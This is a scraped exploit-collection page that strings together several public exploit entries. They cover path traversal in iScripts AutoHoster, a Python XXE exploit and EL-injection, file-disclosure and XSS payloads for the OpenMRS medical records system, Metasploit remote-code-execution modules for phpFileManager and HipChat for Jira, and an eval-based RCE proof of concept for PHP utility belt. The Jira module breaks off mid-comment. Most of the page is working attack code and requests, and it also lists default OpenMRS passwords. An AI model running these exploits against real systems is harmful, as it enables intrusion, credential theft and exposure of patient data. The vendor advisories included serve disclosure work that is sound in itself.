HireHackking

source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. /support/admin/csvdownload.php $filename="../csvfiles/".addslashes($_GET["id"]).".txt"; header('Content-Description: File Transfer'); header('Content-Type: application/force-download'); header('Content-Length: ' . filesize($filename)); header('Content-Disposition: attachment; filename=' . basename($filename)); readfile($filename); [+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00

source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. /admin/downloadfile.php > probably injected by the Guy who nulled the script (thank u any way ;p) $filename = urldecode($_GET['fname']); header("content-disposition:attachment;filename=$filename"); readfile($filename) no need to cancel any thing , just beat it bro ;) [+] Exploit : /admin/downloadfile.php?fname=../includes/config.php

source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. /websitebuilder/showtemplateimage.php include_once "includes/session.php"; include_once "includes/function.php"; $templateid = $_GET['tmpid']; $type = $_GET['type']; if ($type == "home") { $imagename = "homepageimage.jpg"; } else if($type == "sub") { $imagename = "subpageimage.jpg"; } else { $imagename = "thumpnail.jpg"; } readfile("./".$_SESSION["session_template_dir"]."/".$templateid."/$imagename"); Hmmm , we can cancel the imagename value via the null byte %00 [+] Exploit : /websitebuilder/showtemplateimage.php?tmpid=../../includes/config.php%00&type=sub

#!/usr/bin/env python # # OpenMRS 2.3 (1.11.4) XML External Entity (XXE) Processing PoC Exploit # # # Vendor: OpenMRS Inc. # Product web page: http://www.openmrs.org # Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0) # OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b)) # # Summary: OpenMRS is an application which enables design of a customized medical # records system with no programming knowledge (although medical and systems analysis # knowledge is required). It is a common framework upon which medical informatics # efforts in developing countries can be built. # # Desc: The vulnerability is caused due to an error when parsing XML entities within # ZIP archives and can be exploited to e.g. disclose data from local resources or cause # a DoS condition (billion laughs) via a specially crafted XML file including external # entity references. # # # Tested on: Ubuntu 12.04.5 LTS # Apache Tomcat/7.0.26 # Apache Tomcat/6.0.36 # Apache Coyote/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5289 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5289.php # # Affected: OpenMRS Core, Serialization.Xstream module, Metadata Sharing module # Severity: Major # Exploit: Remote Code Execution by an authenticated user # # Vendor Bug Fixes: # # Disabled serialization and deserialization of dynamic proxies # Disabled deserialization of external entities in XML files # Disabled spring's Expression Language support # # https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868 # https://talk.openmrs.org/t/critical-security-advisory-2015-11-25/3824 # https://wiki.openmrs.org/display/RES/Release+Notes+2.3.1 # http://openmrs.org/2015/12/reference-application-2-3-1-released/ # https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.9.10 # https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.10.3 # https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.11.5 # https://modules.openmrs.org/modulus/api/releases/1308/download/serialization.xstream-0.2.10.omod # https://modules.openmrs.org/modulus/api/releases/1309/download/metadatasharing-1.1.10.omod # https://modules.openmrs.org/modulus/api/releases/1303/download/reporting-0.9.8.1.omod # # OpenMRS platform has been upgraded to version 1.11.5 # Reporting module has been upgraded to version 0.9.8.1 # Metadata sharing module has been upgraded to version 1.1.10 # Serialization.xstream module has been upgraded to version 0.2.10 # # Who is affected? # # Anyone running OpenMRS Platform (1.9.0 and later) # Anyone running OpenMRS Reference Application 2.0, 2.1, 2.2, 2.3 # Anyone that has installed the serialization.xstream module except for the newly released 0.2.10 version. # Anyone that has installed the metadatasharing module except for the newly released 1.1.10 version. # # # 02.11.2015 # import itertools, mimetools, mimetypes import cookielib, urllib, urllib2, sys import time, datetime, re, zipfile, os import binascii from urllib2 import URLError global bindata piton = os.path.basename(sys.argv[0]) def bannerche(): print ''' @-------------------------------------------------@ | | | OpenMRS 2.3 Authenticated XXE Exploit | | ID: ZSL-2015-5289 | | Copyleft (c) 2015, Zero Science Lab | | | @-------------------------------------------------@ ''' if len(sys.argv) < 4: print '\n[+] Usage: '+piton+' <host> <port> <path> \n' print '[+] Example: '+piton+' uat05.zeroscience.mk 8080 openmrs\n' sys.exit() bannerche() print '[+] Date: '+str(datetime.date.today()) payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ZSL [ <!ENTITY xxe1 SYSTEM "file:////etc/passwd" > <!ENTITY xxe2 SYSTEM "file:///etc/resolv.conf" > <!ENTITY xxe3 SYSTEM "file:///etc/issue" >]> <package id="1" uuid="eecb64f8-35b0-412b-acda-3d83edf4ee63"> <dateCreated id="2">2015-11-06 10:47:19</dateCreated> <name>&xxe1;</name> <description>&xxe2;</description> <openmrsVersion>&xxe3;</openmrsVersion> <version>1</version> </package>''' print '[+] Creating header.xml file.' file = open('header.xml', 'w') file.write(payload) file.close() time.sleep(1) print '[+] Packing evil XML file.' with zipfile.ZipFile('xxe.zip', 'w') as devzip: devzip.write('header.xml') os.remove('header.xml') print '[+] XML file vacuumed.' time.sleep(1) filename = 'xxe.zip' with open(filename, 'rb') as f: content = f.read() hexo = binascii.hexlify(content) bindata = binascii.unhexlify(hexo) print '[+] File xxe.zip successfully created!' print '[+] Initialising communication.' host = sys.argv[1] port = sys.argv[2] path = sys.argv[3] cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) print '[+] Probing target http://'+host+':'+port+'/'+path+'/' try: checkhost = opener.open('http://'+host+':'+port+'/'+path+'/login.htm') hostresp = checkhost.read() except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '[+] Error:' print '[+] Check your path entry!' print sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print '[+] Error:' print '[+] Check your hostname entry!' print sys.exit() print '[+] Target seems OK.' print '[+] Login please:' print ''' Username: doctor nurse clerk sysadmin admin scheduler Password: Doctor123 Nurse123 Clerk123 Sysadmin123 Admin123 Scheduler123 ''' username = raw_input('[*] Enter username: ') password = raw_input('[*] Enter password: ') login_data = urllib.urlencode({ 'username' : username, 'password' : password, 'sessionLocation' : '3', 'redirectUrl' : '/'+path+'/module/metadatasharing/import/list.form' }) login = opener.open('http://'+host+':'+port+'/'+path+'/login.htm', login_data) auth = login.read() for session in cj: sessid = session.name print '[+] Mapping session ID.' ses_chk = re.search(r'%s=\w+' % sessid , str(cj)) cookie = ses_chk.group(0) print '[+] Cookie: '+cookie if re.search(r'Invalid username/password. Please try again', auth): print '[+] Incorrect username or password.' print sys.exit() else: print '[+] Authenticated!' opener.open('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/list.form') print '[+] Sending payload.' class MultiPartForm(object): def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): parts = [] part_boundary = '--' + self.boundary parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened) if __name__ == '__main__': form = MultiPartForm() form.add_field('file"; filename="xxe.zip', bindata) form.add_field('url', '') request = urllib2.Request('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/upload.form') request.add_header('User-agent', 'joxypoxy 6.5') body = str(form) request.add_header('Origin', 'http://'+host+':'+port) request.add_header('Accept-Encoding', 'gzip, deflate') request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8') request.add_header('Accept-Language', 'en-US,en;q=0.8') request.add_header('Cache-Control', 'max-age=0') request.add_header('Upgrade-Insecure-Requests', '1') request.add_header('Referer', 'http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/upload.form') request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookie) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read() time.sleep(1) print '[+] Retrieving /etc/passwd:' time.sleep(2) getinfo = opener.open('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/validate.form') readinfo = getinfo.read() striphtml = re.sub("<.*?>", "", readinfo) match = re.search(r'root:.*/bin/bash', striphtml, re.DOTALL) print '\n--------------------------------------------------------' print match.group(0) print '--------------------------------------------------------' sys.exit()

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'phpFileManager 0.9.8 Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file. }, 'License' => MSF_LICENSE, 'Author' => [ 'hyp3rlinx', # initial discovery 'Jay Turla' # msf ], 'References' => [ [ 'EDB', '37709' ], [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website ], 'Privileged' => false, 'Payload' => { 'Space' => 2000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Platform' => %w{ unix win }, 'Arch' => ARCH_CMD, 'Targets' => [ ['phpFileManager / Unix', { 'Platform' => 'unix' } ], ['phpFileManager / Windows', { 'Platform' => 'win' } ] ], 'DisclosureDate' => 'Aug 28 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']), ],self.class) end def check txt = Rex::Text.rand_text_alpha(8) res = http_send_command("echo #{txt}") if res && res.body =~ /#{txt}/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def push uri = normalize_uri(target_uri.path) # To push the Enter button res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'frame' => '3', 'pass' => '' # yep this should be empty } }) if res.nil? vprint_error("#{peer} - Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 print_good("#{peer} - Logged in to the file manager") cookie = res.get_cookies cookie else fail_with(Failure::Unknown, "#{peer} - Error entering the file manager") end end def http_send_command(cmd) cookie = push res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookie, 'vars_get' => { 'action' => '6', 'cmd' => cmd } }) unless res && res.code == 200 fail_with(Failure::Unknown, "Failed to execute the command.") end res end def exploit http_send_command(payload.encoded) end end

OpenMRS 2.3 (1.11.4) Expression Language Injection Vulnerability Vendor: OpenMRS Inc. Product web page: http://www.openmrs.org Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0) OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b)) Summary: OpenMRS is an application which enables design of a customized medical records system with no programming knowledge (although medical and systems analysis knowledge is required). It is a common framework upon which medical informatics efforts in developing countries can be built. Desc: Input passed via the 'personType' parameter is not properly sanitised in the spring's expression language support via 'addPerson.htm' script before being used. This can be exploited to inject expression language (EL) and subsequently execute arbitrary Java code. Tested on: Ubuntu 12.04.5 LTS Apache Tomcat/7.0.26 Apache Tomcat/6.0.36 Apache Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5288 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5288.php Affected: OpenMRS Core, Serialization.Xstream module, Metadata Sharing module Severity: Major Exploit: Remote Code Execution by an authenticated user Vendor Bug Fixes: Disabled serialization and deserialization of dynamic proxies Disabled deserialization of external entities in XML files Disabled spring's Expression Language support https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868 https://talk.openmrs.org/t/critical-security-advisory-2015-11-25/3824 https://wiki.openmrs.org/display/RES/Release+Notes+2.3.1 http://openmrs.org/2015/12/reference-application-2-3-1-released/ https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.9.10 https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.10.3 https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.11.5 https://modules.openmrs.org/modulus/api/releases/1308/download/serialization.xstream-0.2.10.omod https://modules.openmrs.org/modulus/api/releases/1309/download/metadatasharing-1.1.10.omod https://modules.openmrs.org/modulus/api/releases/1303/download/reporting-0.9.8.1.omod OpenMRS platform has been upgraded to version 1.11.5 Reporting module has been upgraded to version 0.9.8.1 Metadata sharing module has been upgraded to version 1.1.10 Serialization.xstream module has been upgraded to version 0.2.10 Who is affected? Anyone running OpenMRS Platform (1.9.0 and later) Anyone running OpenMRS Reference Application 2.0, 2.1, 2.2, 2.3 Anyone that has installed the serialization.xstream module except for the newly released 0.2.10 version. Anyone that has installed the metadatasharing module except for the newly released 1.1.10 version. 02.11.2015 -- http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${3*3}&viewType= http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${applicationScope}&viewType= http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=%3Ci%3E${username}&viewType= http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${cookie[%22JSESSIONID%22].value} http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${Condition?%22Ok%22:3%3C2}

OpenMRS 2.3 (1.11.4) Local File Disclosure Vulnerability Vendor: OpenMRS Inc. Product web page: http://www.openmrs.org Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0) OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b)) Summary: OpenMRS is an application which enables design of a customized medical records system with no programming knowledge (although medical and systems analysis knowledge is required). It is a common framework upon which medical informatics efforts in developing countries can be built. Desc: OpenMRS suffers from a file disclosure vulnerability when input passed thru the 'url' parameter to viewPortlet.htm script is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks. Tested on: Ubuntu 12.04.5 LTS Apache Tomcat/7.0.26 Apache Tomcat/6.0.36 Apache Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5286 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5286.php Vendor: https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868 02.11.2015 -- http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportProcessorPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fMETA-INF%2fmaven%2forg.openmrs.web%2fopenmrs-webapp%2fpom.xml%3bx%3d

OpenMRS 2.3 (1.11.4) Multiple Cross-Site Scripting Vulnerabilities Vendor: OpenMRS Inc. Product web page: http://www.openmrs.org Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0) OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b)) Summary: OpenMRS is an application which enables design of a customized medical records system with no programming knowledge (although medical and systems analysis knowledge is required). It is a common framework upon which medical informatics efforts in developing countries can be built. Desc: OpenMRS suffers from multiple stored and reflected cross-site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Ubuntu 12.04.5 LTS Apache Tomcat/7.0.26 Apache Tomcat/6.0.36 Apache Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5287 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5287.php Vendor: https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868 02.11.2015 -- PoC: <html> <body> <form action="http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form" method="POST"> <input type="hidden" name="parentUUID" value="71dde2c8&#45;60be&#45;4171&#45;9d3d&#45;71293cdc4142" /> <input type="hidden" name="name" value=""><script>alert&#40;1&#41;<&#47;script>" /> <input type="hidden" name="description" value=""><script>alert&#40;2&#41;<&#47;script>" /> <input type="submit" value="Submit" /> </form> </body> </html> Other vulnerable scripts/parameters (GET/POST, Stored/Reflected) Payload: <script>alert(1)</script> http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addName parameter] http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter] http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter] http://127.0.0.1:8080/openmrs/admin/users/users.list [Referer HTTP header] http://127.0.0.1:8080/openmrs/admin/users/user.form [userId parameter] http://127.0.0.1:8080/openmrs/options.form [defaultLocation parameter] http://127.0.0.1:8080/openmrs/options.form [lang parameter] http://127.0.0.1:8080/openmrs/options.form [newPassword parameter] http://127.0.0.1:8080/openmrs/options.form [oldPassword parameter] http://127.0.0.1:8080/openmrs/options.form [personName.familyName parameter] http://127.0.0.1:8080/openmrs/options.form [personName.givenName parameter] http://127.0.0.1:8080/openmrs/options.form [secretAnswerNew parameter] http://127.0.0.1:8080/openmrs/options.form [secretQuestionPassword parameter] http://127.0.0.1:8080/openmrs/options.form [username parameter] http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [addUserAccount parameter] http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [familyName parameter] http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [gender parameter] http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [givenName parameter] http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [username parameter] http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [definitionUiResource parameter] http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [returnUrl parameter] http://127.0.0.1:8080/openmrs/login.htm [sessionLocation parameter] http://127.0.0.1:8080/openmrs/referenceapplication/userApp.page [action parameter] http://127.0.0.1:8080/openmrs/uicommons/messages/get.action [codes parameter] http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [description parameter] http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [name parameter] http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parameterName parameter] http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parentUUID parameter] http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [reportId parameter] http://127.0.0.1:8080/openmrs/admin/reports/reportMacros.form [macros parameter] http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [reportSchemaId parameter] http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [xml parameter] http://127.0.0.1:8080/openmrs/admin/reports/runReport.form [schedule parameter] http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter] http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm [id parameter] http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [cancelCallback parameter] http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [label parameter] http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [saveCallback parameter] http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [valueType parameter] http://127.0.0.1:8080/openmrs/module/metadatasharing/export/edit.form [type parameter] http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [concept parameter] http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [instructions parameter] http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [orderType parameter] http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [patient parameter] http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addAge parameter] http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter] http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter] http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [description parameter] http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [name parameter] http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [taskClass parameter] http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.list [taskId parameter] http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter] http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben_GB%5D.name parameter] http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bfr%5D.name parameter] http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bht%5D.name parameter] http://127.0.0.1:8080/openmrs/dictionary/concept.form [synonymsByLocale%5Ben%5D%5B0%5D.name parameter] http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [description parameter] http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [name parameter] http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [ruleContent parameter] http://127.0.0.1:8080/openmrs/module/logic/logic.form [patientId parameter] http://127.0.0.1:8080/openmrs/patientDashboard.form [patientGraphConcept parameter]

Exploit Title : PHP utility belt Remote Code Execution vulnerability Author : WICS Date : 8/12/2015 Software Link : https://github.com/mboynes/php-utility-belt Overview: PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it. ajax.php is accessible without any authentication Vulnerable code (Line number 12 to 15) if ( isset( $_POST['code'] ) ) { if ( false === eval( $_POST['code'] ) ) echo 'PHP Error encountered, execution halted'; } POC Access URL http://127.0.0.1/php-utility-belt/ajax.php in Post data type code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>'); above code will generate info.php file which will display php info Shell link will be http://127.0.0.1/php-utility-belt/info.php

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'json' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Atlassian HipChat for Jira Plugin Velocity Template Injection", 'Description' => %q{ Atlassian Hipchat is a web service for internal instant messaging. A plugin is available for Jira that allows team collibration at real time. A message can be used to inject Java code into a Velocity template, and gain code exeuction as Jira. Authentication is required to exploit this vulnerability, and you must make sure the account you're using isn't protected by captcha. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with a vulnerable copy of HipChat. When using the check command, if you supply a valid username and password, the module will be able to trigger the bug and check more accurately. If not, it falls back to passive, which can only tell if the target is running on a Jira version that is bundled with a vulnerable copy of Hipchat by default, which is less reliable. This vulnerability was originally discovered internally by Atlassian. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Wood', # PoC 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2015-5603' ], [ 'EDB', '38551' ], [ 'BID', '76698' ], [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ] ], 'Targets' => [ [ 'HipChat for Jira plugin on Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], [ 'HipChat for Jira plugin on Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], [ 'HipChat for Jira plugin on Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] ], 'DefaultOptions' => { 'RPORT' => 8080 }, 'Privileged' => false, 'DisclosureDate' => 'Oct 28 2015', 'DefaultTarget' => 0 )) register_options( [ # Auth is required, but when we use the check command we allow them to be optional. OptString.new('JIRAUSER', [false, 'Jira Username', '']), OptString.new('JIRAPASS', [false, 'Jira Password', '']), OptString.new('TARGETURI', [true, 'The base to Jira', '/']) ], self.class) end # Returns a cookie in a hash, so you can ask for a specific parameter. # # @return [Hash] def get_cookie_as_hash(cookie) Hash[*cookie.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/).flatten] end # Checks the target by actually triggering the bug. # # @return [Array] Exploit::CheckCode::Vulnerable if bug was triggered. # Exploit::CheckCode::Unknown if something failed. # Exploit::CheckCode::Safe for the rest. def do_explicit_check begin cookie = do_login # I don't really care which command to execute, as long as it's a valid one for both platforms. # If the command is valid, it should return {"message"=>"0"}. # If the command is not valid, it should return an empty hash. c = get_exec_code('whoami') res = inject_template(c, cookie) json = res.get_json_document if json['message'] && json['message'] == '0' return Exploit::CheckCode::Vulnerable end rescue Msf::Exploit::Failed => e vprint_error(e.message) return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end # Returns the Jira version # # @return [String] Found Jira version # @return [NilClass] No Jira version found. def get_jira_version version = nil res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa') }) unless res vprint_error('Connection timed out while retrieving the Jira version.') return version end metas = res.get_html_meta_elements version_element = metas.select { |m| m.attributes['name'] && m.attributes['name'].value == 'ajs-version-number' }.first unless version_element vprint_error('Unable to find the Jira version.') return version end version_element.attributes['content'] ? version_element.attributes['content'].value : nil end # Checks the target by looking at things like the Jira version, or whether the Jira web app # exists or not. # # @return [Array] Check code. If the Jira version matches the vulnerable range, it returns # Exploit::CheckCode::Appears. If we can only tell it runs on Jira, we return # Exploit::CheckCode::Detected, because it's possible to have Jira not bundled # with HipChat by default, but installed separately. For other scenarios, we # return Safe. def do_passive_check jira_version = get_jira_version vprint_status("Found Jira version: #{jira_version}") if jira_version && jira_version >= '6.3.5' && jira_version < '6.4.11' return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end # Checks the vulnerability. Username and password are required to be able to accurately verify # the vuln. If supplied, we will try the explicit check (which will trigger the bug, so should # be more reliable). If not, we will try the passive one (less accurately, but better than # nothing). # # @see #do_explicit_check # @see #do_passive_check # # @return [Array] Check code def check checkcode = Exploit::CheckCode::Safe if jira_cred_empty? vprint_status("No username and password supplied, so we can only do a passive check.") checkcode = do_passive_check else checkcode = do_explicit_check end checkcode end # Returns the Jira username set by the user def jira_username datastore['JIRAUSER'] end # Returns the Jira password set by the user def jira_password datastore['JIRAPASS'] end # Reports username and password to the database. # # @param opts [Hash] # @option opts [String] :user # @option opts [String] :password # # @return [void] def report_cred(opts) service_data = { address: rhost, port: rport, service_name: ssl ? 'https' : 'http', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: fullname, post_reference_name: self.refname, private_data: opts[:password], origin_type: :service, private_type: :password, username: opts[:user] }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, last_attempted_at: Time.now }.merge(service_data) create_credential_login(login_data) end # Returns a valid login cookie. # # @return [String] def do_login cookie = '' prerequisites = get_login_prerequisites xsrf = prerequisites['atlassian.xsrf.token'] sid = prerequisites['JSESSIONID'] uri = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }, 'cookie' => "atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}", 'vars_post' => { 'os_username' => jira_username, 'os_password' => jira_password, 'os_captcha' => '' # Not beatable yet } }) unless res fail_with(Failure::Unknown, 'Connection timed out while trying to login') end json = res.get_json_document if json.empty? fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.') end if json['loginSucceeded'] cookie = res.get_cookies elsif !json['loginSucceeded'] && json['captchaFailure'] fail_with(Failure::NoAccess, "#{jira_username} is protected by captcha. Please try a different account.") elsif !json['loginSucceeded'] fail_with(Failure::NoAccess, 'Incorrect username or password') end report_cred( user: jira_username, password: jira_password ) cookie end # Returns login prerequisites # # @return [Hash] def get_login_prerequisites uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa') res = send_request_cgi({ 'uri' => uri }) unless res fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites') end get_cookie_as_hash(res.get_cookies) end # Returns the target platform. # # @param cookie [String] Jira cookie # @return [String] def get_target_platform(cookie) c = get_os_detection_code res = inject_template(c, cookie) json = res.get_json_document json['message'] || '' end # Returns Java code that can be used to inject to the template in order to write 